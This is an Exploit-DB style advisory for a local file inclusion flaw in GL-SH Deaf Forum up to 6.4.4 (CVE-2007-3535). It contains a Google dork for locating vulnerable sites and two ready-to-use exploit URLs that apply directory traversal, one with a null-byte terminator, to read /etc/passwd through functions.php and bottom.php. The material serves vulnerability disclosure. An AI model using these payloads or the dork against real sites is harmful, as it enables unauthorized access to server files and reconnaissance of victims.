GL-SH Deaf Forum <= 6.4.4 Local File Inclusion Vulnerabilities

EDB-ID: 4124	CVE: 2007-3535	OSVDB-ID: 37110
Author: Katatafish	Published: 2007-06-28	Verified:
Exploit Code:	Vulnerable App: N/A

###GL-SH Deaf Board Version <= 6.4.4 local file inclusion###

#download: http://www.frank-karau.de/download/Deafforum_version_6.4.3.zip

#found by: Katatafish (karatatata@hush.com)

#google dork:"2005  www.frank-karau.de" | "2006  www.frank-karau.de"

#exploit:
http://www.site.com/[path]/functions.php?FORUM_LANGUAGE=../../../../../../../../../../../etc/passwd
http://www.site.com/[path]/bottom.php?style=../../../../../../.././etc/passwd%00

# milw0rm.com [2007-06-28]

Comments

GL-SH Deaf Forum <= 6.4.4 Local File Inclusion Vulnerabilities

Rating

No comments so far